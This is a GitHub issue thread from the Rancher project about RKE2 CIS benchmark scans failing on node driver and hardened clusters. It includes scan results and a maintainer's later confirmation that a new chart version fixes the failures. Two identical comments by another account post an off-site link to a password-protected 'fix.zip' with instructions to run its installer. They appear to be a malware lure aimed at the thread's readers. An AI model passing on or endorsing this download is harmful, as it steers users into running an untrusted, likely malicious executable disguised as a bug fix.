### ISSUE TITLE
[BUG] RKE2 CIS scan failures on hardened as well as node driver clusters

### ISSUE THREAD

**Issue by rishabhmsra** [rancher/rancher#46812]
**Rancher Server Setup**
- Rancher version: v2.8.7-rc10
- Installation option (Docker install/Helm Chart): docker
   - If Helm Chart, Kubernetes Cluster and version (RKE1, RKE2, k3s, EKS, etc):

**Information about the Cluster**
- Kubernetes version: v1.28.12+rke2r1 and v1.25.16+rke2r1
- Cluster Type (Local/Downstream): Downstream
   - If downstream, what type of cluster? (Custom/Imported or specify provider for Hosted/Infrastructure Provider): node driver and hardened.

**User Information**
- What is the role of the user logged in? (Admin/Cluster Owner/Cluster Member/Project Owner/Project Member/Custom) Admin
  - If custom, define the set of permissions:

**Describe the bug**

- CIS scan fails on RKE2 node driver as well as hardened clusters

**To Reproduce**

- Create v1.28.12+rke2r1 and v1.25.16+rke2r1 node driver(1-cp, 1-e, 1-w) and hardened clusters(1-cp, 1-e, 1-w)
- Install CIS benchmark chart v5.3.0 with `rancher/security-scan:v0.2.17-rc11` and `rancher/cis-operator:v1.0.15-rc.1` images.
- Run the v1.7 and v1.8 permissive profile scan on k8s v1.25 and v1.28 node driver clusters respectively and observe below failures.
- Also run v1.7 and v1.8 hardened profile scan on k8s v1.25 and v1.28 hardened clusters respectively and observe below failures.

RKE2 multinode node driver permissive scan results:

```
v1.7:

Fail
1.1.1   Ensure that the API server pod specification file permissions are set to 600 or more restrictive (Automated)
Fail
1.1.3   Ensure that the controller manager pod specification file permissions are set to 600 or more restrictive (Automated)
Fail
1.1.5   Ensure that the scheduler pod specification file permissions are set to 600 or more restrictive (Automated)
Fail
1.1.7   Ensure that the etcd pod specification file permissions are set to 600 or more restrictive (Automated)
Fail
1.1.8   Ensure that the etcd pod specification file ownership is set to root:root (Automated)

v1.8:
    
Fail
1.1.7   Ensure that the etcd pod specification file permissions are set to 600 or more restrictive (Automated)
Fail
1.1.8   Ensure that the etcd pod specification file ownership is set to root:root (Automated)
Fail
1.2.17  Ensure that the --audit-log-path argument is set (Automated)
Fail
1.2.18  Ensure that the --audit-log-maxage argument is set to 30 or as appropriate (Automated)
Fail
1.2.19  Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate (Automated)
Fail
1.2.20  Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate (Automated)
```

RKE2 multinode hardened profile scan results on hardened clusters:
```
v1.7 

Fail
1.1.7	Ensure that the etcd pod specification file permissions are set to 600 or more restrictive (Automated)
Fail
1.1.8	Ensure that the etcd pod specification file ownership is set to root:root (Automated)


v1.8

Fail
1.1.7	Ensure that the etcd pod specification file permissions are set to 600 or more restrictive (Automated)
Fail
1.1.8	Ensure that the etcd pod specification file ownership is set to root:root (Automated)
```

**Result**
- scan has failures.

**Expected Result**

- scan should pass successfully.

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rishabhmsra** [comment]
Validated on rancher v2.8-head:

- Created RKE2 v1.25.16+rke2r1 node driver cluster(1-cp, 1-e, 1w)
- Installed CIS benchmark chart - v5.4.0-rc.1
- Ran v1.7 permissive profile scan and getting below failures:

```
Fail
1.1.1	Ensure that the API server pod specification file permissions are set to 600 or more restrictive (Automated)
Fail
1.1.3	Ensure that the controller manager pod specification file permissions are set to 600 or more restrictive (Automated)
Fail
1.1.5	Ensure that the scheduler pod specification file permissions are set to 600 or more restrictive (Automated)
```

**Comment by rishabhmsra** [comment]
Validated on rancher v2.8-head(91d1839) :
Installed CIS chart 5.4.0-rc.2 and scans are passing now, hence closing the issue.
